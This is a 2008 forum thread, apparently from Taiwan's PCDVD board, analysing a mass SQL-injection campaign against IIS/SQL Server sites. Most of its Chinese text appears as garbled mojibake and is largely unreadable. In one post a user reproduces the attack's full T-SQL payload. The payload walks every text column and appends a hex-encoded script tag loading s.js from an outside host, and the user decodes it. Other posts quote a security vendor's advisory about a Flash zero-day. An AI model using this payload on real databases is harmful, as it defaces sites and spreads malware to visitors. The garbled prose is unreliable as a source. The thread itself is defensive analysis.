PCDVD¼Æ¦ì¬ì§Þ°Q½×°Ï
PCDVD¼Æ¦ì¬ì§Þ°Q½×°Ï   µù¥U ±`¨£°ÝÃD ¼Ð°O°Q½×°Ï¬°¤wŪ

¦^¨ì   PCDVD¼Æ¦ì¬ì§Þ°Q½×°Ï > ¨ä¥L¸s²Õ > ¤C¼L¤K¦Þ²§¨¥°ó
±b¤á
±K½X
 

  ¦^À³
 
¥DÃD¤u¨ã
foxtm
Power Member
 
foxtmªº¤jÀY·Ó
 

¥[¤J¤é´Á: Jan 2002
±zªº¦í§}: ¥x¥_­W©RIT¤u¤H
¤å³¹: 586
Smile

¤Þ¥Î:
§@ªÌhakken
...³o¥u¬O¦b¤å¦r¦ê¤º¶ë¤JHTML tagªº¤@ºØcode injection¡Asql injection¤£¬O³o¼Ë¡I
sql injection¤£¥u¬Owindows·|¦³ªº¡I¼g§@¤£¨}ªºweb application³£·|¦³³o¼Ëªº¦MÀI¡C


¤p§Ì»{¬°¦³¤K¦¨ªº¥i¯à¬O SQL Injection ..
¦]¬°¥Ñ¼Ó¥D´£¨ÑªººI¹Ï¬Ý¨Ó..¸ê®Æ®w¤º¤w¸g³Q update ¹L¦Ó¶ë¤J¤F java script¤F ..
©Ò¥H¨C­Ó®a±Ú¦WºÙ¤U­±³£¥X²{­«½Æ©Êªº java script code ..

«ö·ÓºI¹Ï§PÂ_..¦ü¥G¸Ó°Q½×°Ï¨t²Î¦³Àɪºjava scriptªº¼Ë¤l..©Ò¥HÁÙ¬O¬Ý±o¨ì code ..
(²{¦b¤u§@¾÷¬O¶]xp¤£´±¥h³s .. ¦^®a´«linux¾÷¾¹¦A³s¨ì¸Óºô¯¸¸Õ¸Õ¬Ý..)
¦pªG¬O¦³¤ß¤H¥h¯d¨¥ª©¤º­«½Æ¶Kcodeªº¸Ü..
À³¸Ó·|¦bµo²{¦³¾×¦íscriptªº±¡ªp¤U°±¤î¶Kªº°Ê§@..©Ò¥H§Ú»{¬°¬O¤w¸g¬}±x¸ê®Æ®wÄæ¦ìªº SQL Injection ..
¦Ó¤£¬O³æ¯Âªº¶K¤å¶ëcodeªºcode injection..

¥t¥~¥H¥L½¯©µªº±¡ªp¦Ó¨¥..
§Ú»{¬°¬O°w¹ï¯S©wªº¯d¨¥ª©¨t²Î¶i¦æ§ðÀ»ªº..
³]©wµ{¦¡¥h¶]..§ì¨ì¬O¯S©w¯d¨¥ª©¨t²Î®É´N¥ÎSQL Injection¶ëcode¶i¥h..

¤£¹L²{¶¥¬q¬O¬Ý¹Ï»¡¬G¨Æ..¤@¤Á³£³£ÁÙ¬O¤p§Ìªº²q´ú°Õ..
±ß¤W¦^®a´«linuxªº¾÷¾¹¦b³s¹L¥h¬Ý¬Ý..
     
      
ÂÂ 2008-05-28, 04:31 PM #11
¦^À³®É¤Þ¥Î¦¹¤å³¹
foxtmÂ÷½u¤¤  
ashin037
Major Member
 

¥[¤J¤é´Á: Jun 2004
¤å³¹: 163
¨â¦~«e¬[phpbb®É´N³Q¶ë¹L¤F..orz|||
 
ÂÂ 2008-05-28, 04:44 PM #12
¦^À³®É¤Þ¥Î¦¹¤å³¹
ashin037Â÷½u¤¤  
chk
Golden Member
 
chkªº¤jÀY·Ó
 

¥[¤J¤é´Á: Apr 2001
±zªº¦í§}: ÂûºÛ
¤å³¹: 2,822
SQL Injection ªº§t·N«Ü¼s§a..
¤£¹L³o­Ó¬Ý¨Ó¬O³æ¯Âªº¦b¯d¨¥ª©ªº¦a¤è¶ë¤Jscript»yªk,¤£¨£±o­n¥Î¨ìSQL »yªk
¦pªG¯d¨¥ª©¨S¦³¹ï¤º®e°µ¤@¨ÇÅçÃҩΧPÂ_,´N·|µo¥Í³oºØª¬ªp
·íµM¥i¥H¤USQL Injection ªº¸Ü,µ²ªG´N¤£¥u¬Oºô­¶³Q¶ëscript¤F...
·d¤£¦nDB³£³Q¬å¤F
ÂÂ 2008-05-28, 05:05 PM #13
¦^À³®É¤Þ¥Î¦¹¤å³¹
chkÂ÷½u¤¤  
Devil
Power Member
 

¥[¤J¤é´Á: Jan 2001
±zªº¦í§}: Taipei
¤å³¹: 503
XSS Attack?SQL Injection?
¤p§Ìªº¬Ýªk¬OXSS Attack,SQL Injectionªº¸Ü,¤£·|¬O¥u¶ñ¤J³o¨Ç¸ê®Æ¦Ó¤w
ª½±µ±Nºô¯¸ªº¾ã­ÓDB Drop±¼³£¥i¥H
¥tSQL Injection or XSS Attack,³£¤£¶È­­©óWindows+IIS¥­¥x
¤j²¤»¡¤@¤U,XSS Attack¬OÂǥѿé¤JScript©óºô­¶¤W,ÅѨúÂsÄý¸Óºô­¶ªº¨Ï¥ÎªÌªºCookie¸ê®Æ
SQL Injection¬O§Q¥ÎSQL »yªk§ðÀ»ºô¯¸«áºÝªºDB
¦U¦ì¥i¥H¤Wgoogle°Ñ¦Ò¤@¤UXSS§ðÀ»
¦³¿ù½Ð«ü±Ð
__________________

¦¹¤å³¹©ó 2008-05-28 05:39 PM ³Q Devil ½s¿è.
ÂÂ 2008-05-28, 05:35 PM #14
¦^À³®É¤Þ¥Î¦¹¤å³¹
DevilÂ÷½u¤¤  
Devil
Power Member
 

¥[¤J¤é´Á: Jan 2001
±zªº¦í§}: Taipei
¤å³¹: 503
¸É¥R.XSS Attack ¤£¥²¸g¥ÑSQL Injection
¨Ò¦p,§Ú²{¦b¦b¯d¨¥®É,¥i¥HÂǥѴ¡¤J¤@­Ó¹Ï¤ù®I¤U¤@¬qjava script¤F
©Ò¥H¨¾¨îªº¤èªk¥i¥H¬O,ServerºÝªºµ{¦¡§PÂ_¯d¨¥¤º®e¬O§_¦³¤£À³¸Ó¥X²{ªº¦r¦ê
__________________
ÂÂ 2008-05-28, 06:04 PM #15
¦^À³®É¤Þ¥Î¦¹¤å³¹
DevilÂ÷½u¤¤  
foxtm
Power Member
 
foxtmªº¤jÀY·Ó
 

¥[¤J¤é´Á: Jan 2002
±zªº¦í§}: ¥x¥_­W©RIT¤u¤H
¤å³¹: 586
Smile

¤Þ¥Î:
§@ªÌDevil
XSS Attack?SQL Injection?
¤p§Ìªº¬Ýªk¬OXSS Attack,SQL Injectionªº¸Ü,¤£·|¬O¥u¶ñ¤J³o¨Ç¸ê®Æ¦Ó¤w
ª½±µ±Nºô¯¸ªº¾ã­ÓDB Drop±¼³£¥i¥H

¦]¬°¥Lªº¥Øªº¬O´²¼· s.js ¦Ó¤£¬O·d«±ºô¯¸..
©Ò¥H¶ñ¤J³o¨Ç¦r¦ê´Nºïºï¦³¾l¤F..§âtable drop±¼¥u¬O¾É­Pºô¯¸ÅõºÈ..
­°§C´²¼½³t«×½}¤F
¤Þ¥Î:
§@ªÌDevil
¥tSQL Injection or XSS Attack,³£¤£¶È­­©óWindows+IIS¥­¥x
¤j²¤»¡¤@¤U,XSS Attack¬OÂǥѿé¤JScript©óºô­¶¤W,ÅѨúÂsÄý¸Óºô­¶ªº¨Ï¥ÎªÌªºCookie¸ê®Æ
SQL Injection¬O§Q¥ÎSQL »yªk§ðÀ»ºô¯¸«áºÝªºDB
¦U¦ì¥i¥H¤Wgoogle°Ñ¦Ò¤@¤UXSS§ðÀ»
¦³¿ù½Ð«ü±Ð

©Ò¥H¥i¯à¬O XSS Attack ²V¦X SQL Injection §ðÀ» ..
§Q¥Î SQL Injection ±Nºô¯¸¤º®e­È¤J java script «á..
¨Ï¥ÎªÌ¥ÎÂsÄý¾¹ÂsÄý®É°õ¦æ¸Ó¬q script ¾É­P XSS Attack ..
¤ì°¨ÂǦ¹¶i¤J¨Ï¥ÎªÌ¹q¸£..¨Ã¥B©óÂsÄý¾¹ÂsÄý¨ä¥Lºô¯¸®É..·|¹Á¸Õ¦³µL SQL Injection º|¬}Ä~Äò´²¼½..
¦]¦¹µo¥Í«e¤å pkopko ¥S´£¨Ñªºª¬ªp..²M±¼«á·|¤@ª½´_µo..¥B¤º¥~ºô¬Ò¤¤¼Ð..
¬Ò»F¦]©ó¤º³¡¨Ï¥ÎªÌ¤¤¤ì°¨¤F..«o¨S¦³µo²{¦Ó¦p±`ªº¨Ï¥Î¤½¥q¤º¥~ºô¯¸

·íµM°Õ ~~ ³oÁÙ¬O¬Ý¹Ï»¡¬G¨Æ ...
¶È¨Ñ°Ñ¦Ò..¦³¿ùÅwªï¥Î¤O¦R¯ó~~

¦¹¤å³¹©ó 2008-05-28 06:34 PM ³Q foxtm ½s¿è.
ÂÂ 2008-05-28, 06:32 PM #16
¦^À³®É¤Þ¥Î¦¹¤å³¹
foxtmÂ÷½u¤¤  
foxtm
Power Member
 
foxtmªº¤jÀY·Ó
 

¥[¤J¤é´Á: Jan 2002
±zªº¦í§}: ¥x¥_­W©RIT¤u¤H
¤å³¹: 586
Smile

¤Þ¥Î:
§@ªÌ³¥¤f¶©¥v
³o¬O°w¹ïiisªºsql¥N½Xª`¤J§ðÀ»
¥uµo¥Í¦bwindows¥­¥x¤W¡A¥Ø«e¥þ¥@¬É¤wª¾³Q§ðÀ»ªººô¯¸¤w¸g¶W¹L50¸U¤F

³¥¤f¥S»¡¹ï¤F..¬O SQL Injection ¨S¿ù..¤£·\¬Oªø´Á¦bÃö¤ß¬ÛÃö¸ê°Tªº°ª¤â
­è­è°lÂܤF script «á.. ¥Î¤@¨ÇÃöÁä¦r¥h¬d¤§«á¤j­P¤F¸Ñ±¡ªp¤F..
¬OÄÝ©ó SQL Injection + XSS + 0day ²V¦X§ðÀ»«¬ªº..
(0day¬O«ü¦b¦w¥þ¸É¤Bµo§G«e¦Ó³Q¤F¸Ñ©M´x´¤ªºº|¬}¸ê°T¡C)

SQL Injection ¨Ï¥Îªº Code ¦p¤U..
¤Þ¥Î:
§@ªÌSQL Injection Code
dEcLaRe @t vArChAr(255),@c vArChAr(255)
dEcLaRe tAbLe_cursoR cUrSoR FoR
exec(¡¥UpDaTe [¡¦+@t+¡¥sElEcT a.nAmE,b.nAmE FrOm sYsObJeCtS a,sYsCoLuMnS b wHeRe a.iD=b.iD

AnD a.xTyPe=¡¥u¡¦ AnD (b.xTyPe=99 oR b.xTyPe=35 oR b.xTyPe=231 oR b.xTyPe=167)
oPeN tAbLe_cursoR fEtCh next FrOm tAbLe_cursoR iNtO @t,@c while(@@fEtCh_status=0)
bEgIn
exec(¡¥UpDaTe [¡¦+@t+¡¥] sEt [¡¦+@c+¡¥]=rtrim(convert(varchar,[¡¦+@c+¡¥]))+cAsT

(0x223E3C2F7469746C653E3C736372697074207372633D687474703A2F2F732E736565392E75732F732E6A733E3

C2F7363726970743E3C212D2D aS vArChAr(67))¡¦)
fEtCh next FrOm tAbLe_cursoR iNtO @t,@c
eNd
cLoSe tAbLe_cursoR
dEAlLoCaTe tAbLe_cursoR

§ðÀ»ªÌ«Ü²Ó¤ßªº¥Î¤F¤j¤p¼g¥æ¿ùÁ×¶}¤@¯ëµ{¦¡¤¤¹ïRequestªºÀˬd..
¹ïSQL Server¸ê®Æ®w¸Ì­±
xtype=99 ntext
xtype=35 text
xtype=231 nvarchar
xtype=167 varchar
¥|ºØ¸ê®Æ«¬ºA¶i¦æ update ..
¶ë¤Jªº¸ê®Æ¤Q¤»¶i¦ì¬°
0x223E3C2F7469746C653E3C736372697074207372633D687474703A2F2F732E736565392E75732F732E6A733E3
Âà´«¬°¦r¦ê§Y¬O"></title><script src=http://s.see9.us/s.js></script><!--
³o¸Ì¦A¦¸®i²{§ðÀ»ªÌªº²Ó¤ß =_= .. ¥Î¤Q¤»¶i¦ì¥N½X¨ú¥N®e©ö³Q§ì¨ìªº html script ..

¦]¬°¥D§ð sql server .. ©Ò¥H¬Ý°_¨Ó³£¬O IIS ¤¤¼Ð.. ²¦³º¤@¯ë«á¥x DB ·|¥Î sql server ªº±¡ªp¤U..«e¥x¤j³£¬O IIS + ASP (.NET) ..

±µ¤U¨Ó¨Ï¥Î XSS Attack Åýºô¯¸ÂsÄýªÌªºÂsÄý¾¹°õ¦æ§ðÀ»ªÌ¦w±Æªº Java Script ..
¥Î 0day Æpº|¬}¨ú±oºô¯¸ÂsÄýªÌ¥»¾÷¤@©wªºÅv­­..¤§«eªº0dayº|¬}¬O§ì real play ªº..
¦ý¥u­n§ðÀ»ªÌ°ª¿³..¥u­n´À´« script ÀH®É¥i¥H¥Î¨ä¥L 0day º|¬}§ðÀ»ÂsÄýªÌ¥»¾÷ ..

³Ì«á¬O§ðÀ»ªÌªº¥Øªº..
À³¸Ó¬O "ÂI¼s§i" .. §Q¥Î¤T­«¾÷¨î±N¤ì°¨¶Ç¼½¥X¥h¤§«á .. À°§ðÀ»ªÌÂIºô¸ô****ÁÈ¿ú ..

¤p§Ì¬O°Ñ¦Òºî¦X¨â¥÷¤j³°½×¾Â¸ê®Æ°µ¥Xªºµ²½×..
¬°§Kª½±µ³s±µ½×¾Âªº¦MÀI..©Ò¥H´£¨Ñ¨â¥÷Google ¤å¦r§Ö¨ú¨ÑªO¤Í­Ì°Ñ¦Ò ..
http://72.14.235.104/search?q=cache...x&gl=tw&strip=1
http://72.14.235.104/search?q=cache...l=zh-TW&strip=1

¶È¨Ñ°Ñ¦Ò..¦³¿ùÅwªï¥Î¤O¦R¯ó~~
ÂÂ 2008-05-29, 02:43 AM #17
¦^À³®É¤Þ¥Î¦¹¤å³¹
foxtmÂ÷½u¤¤  
foxtm
Power Member
 
foxtmªº¤jÀY·Ó
 

¥[¤J¤é´Á: Jan 2002
±zªº¦í§}: ¥x¥_­W©RIT¤u¤H
¤å³¹: 586
Smile

¨ä¹êÂI¶i³¥¤f¥Sªºavpclub½×¾Â
°¨¤W´N§ä¨ì¬ÛÃö¸ê°T¤F ^^||| ..¹ê¦b»á¦³¥Õ°µ¥\½Ò¤§·Pı..
http://www.avpclub.ddns.info/discuz...-10913-1-1.html
¤Þ¥Î:
§@ªÌAVPClubºô¸ô¦w¥þ½×¾Â STONE
¥xÆWºô¯¸¾D¨ü¦³¥v¥H¨Ó³Ì¤j³W¼ÒSQL Injection §ðÀ»
·s«¬ºAªºMass SQL Injection¦b¥x¤Wºt
¤º¦³¸Ô²Óªº§ðÀ»»¡©ú
¸ê®Æ¨Ó·½ªüº¿¬ì§Þ
½Ð°Ñ¦Ò¥H¤Uºô§}:http://www.armorize.com.tw/news/shownews.php?news=22

¥i¨ÑªO¤Í­Ì°Ñ¦Ò
ÂÂ 2008-05-29, 03:03 AM #18
¦^À³®É¤Þ¥Î¦¹¤å³¹
foxtmÂ÷½u¤¤  
hakken
Regular Member
 

¥[¤J¤é´Á: Sep 2002
±zªº¦í§}: Earth
¤å³¹: 56
foxtm²Ó¤ß¡I¯uªº¨ü±Ð¤F¡I¡I
³o¬Ocode injection, sql injectionªº²Õ¦X¨S¿ù¡I
¬Ý¹Ï»¡¸ÜªGµM½§²L¡A¤S¨ü±Ð¤F¤@¦¸¡I¡I
¤£¹L­n¬O¨Ï¥Îsql injection¡A´N­n²q¨ìtableªºÄæ¦ì¦WºÙ
©Ò¥H³oÀ³¸Ó¬O°w¹ï¤@¨Ç²{¦¨®M¸Ë(¦³«Ü¦h¬Oºô¸ô¤W¨ú±o§K¶Oªº)¨t²Îªº§ðÀ»§a¡I

¦¹¤å³¹©ó 2008-05-29 03:25 AM ³Q hakken ½s¿è.
ÂÂ 2008-05-29, 03:17 AM #19
¦^À³®É¤Þ¥Î¦¹¤å³¹
hakkenÂ÷½u¤¤  
chk
Golden Member
 
chkªº¤jÀY·Ó
 

¥[¤J¤é´Á: Apr 2001
±zªº¦í§}: ÂûºÛ
¤å³¹: 2,822
¬ÛÃö¸ê°T¦b³oùØ
http://www.armorize.com.tw/news/shownews.php?news=22
¤µ¤Ñ¤S¦³·sªº¸ê°T¥X¨Ó
http://www.armorize.com.tw/news/shownews.php?news=23

ªü½X¬ì§ÞASF™(Armorize Special Forces)¸ê¦w¹Î¶¤²`¤J¤ÀªR«á¡A©ó05¤ë20¤é³qª¾´CÅé¨Ãµo¥X·s»D½Z¡G

05202008 ¥xÆWºô¯¸¾D¨ü¦³¥v¥H¨Ó³Ì¤j³W¼ÒSQL Injection §ðÀ»--·s«¬ºAªºMass SQL Injection¦b¥x¤Wºt

·í®É§Ú­Ì©ó·s»D½Z¤¤«ü¥X¡A¡u±À´ú¥Ç¸o¶°¹Î¦b¶i¦æ¤j³W¼Òºô¯¸§G§½¡Aµ¥«Ý¤U¤@­ÓÂsÄý¾¹¹s®É®t§ðÀ»(Zero Day Attack) ¥X²{«á¤j¶q¦¬³Î¡C¡v

¦]¬°·í®ÉASF™¹Î¶¤¦b°lÂܹLµ{¤¤¤w¸gµo²{¡A¥Ç¸o¶°¹Î¦ü¥G¬G·N¤£Åý´c·N³sµ²µo¥Í¹ê»Ú®Ä¥Î¡A§G§½ªº·N¨ý¿@«p¡C

ASF™¹Î¶¤©ó05¤ë23¤é¶}©l¡Aµo²{Àb«È¶°¹Î¦b¨ä¤j³W¼ÒSQL Injection§ðÀ»¤¤¡A¶}©l±Ä¥Î§ðÀ»Adobe Flash¤§ºô°¨¡]malware¡^¡A¸g²`¤J¤ÀªR¡A»®µMµo²{¦¹¬°Adobe Flash ¤§¹s®É®t§ðÀ»¡]Zero Day Attack / 0day¡^¡I¦¹¦¸¤j³W¼Ò§ðÀ»¡A¦Û01¤ë¶}©l¦Ü¤µ¥¼°±¡A¥Ø«e¤S¥X²{·f°t¹s®É®t§ðÀ»¤âªk¡A³ôºÙ«e©Ò¥¼¦³¤§ÄY­«¤j³W¼Ò§ðÀ»¨Æ¥ó¡A¬G¸Ô­z¦p¤U¡C

[¥Î¤áºÝ¦w¥þ«ØÄ³ ]

¦¹¦¸¬°¹s®É®t§ðÀ»¡A¬G§Ú­Ì©ó05¤ë20¤½¥¬¤§[¥Î¤áºÝ¦w¥þ«ØÄ³]µL®Ä¡C°w¹ï¦¹¦¸§ðÀ»¡A§Ú­Ì«ØÄ³¼È®ÉÃö³¬Adobe Flash¡CÁöµM¦¹Á|·|³y¦¨³\¦hºô¯¸¦bÂsÄý®É¤§°ÝÃD¡AµM¦¹¬°¹s®É®t§ðÀ»¡A¥Ø«e¨ÃµL¨ä¥L¤èªk¡CIE¨Ï¥ÎªÌ¥i¦Û[¤u¨ã]¡÷ºÞ²zªþ¥[¤u¨ã¡A¨Ã°±¥Î"Shockwave Flash Object"¡CFirefox¥Î¤á¥i¥H§Q¥Îregedt32.exe(regedit.exe)§â CLSID ¤§ d27cdb6e-ae6d-11cf-96b8-444553540000³]¦¨ 1¡A¥H¼È®É°±¤îFlash¤§¹B§@¡C
ÂÂ 2008-05-29, 08:33 AM #20
¦^À³®É¤Þ¥Î¦¹¤å³¹
chkÂ÷½u¤¤  


    ¦^À³


POPIN
¥DÃD¤u¨ã

µoªí¤å³¹³W«h
±z¤£¥i¥Hµo°_·s¥DÃD
±z¤£¥i¥H¦^À³¥DÃD
±z¤£¥i¥H¤W¶Çªþ¥[ÀÉ®×
±z¤£¥i¥H½s¿è±zªº¤å³¹

vB ¥N½X¥´¶}
[IMG]¥N½X¥´¶}
HTML¥N½XÃö³¬



©Ò¦³ªº®É¶¡§¡¬°GMT +8¡C ²{¦bªº®É¶¡¬O04:32 AM.


vBulletin Version 3.0.1
powered_by_vbulletin 2026¡C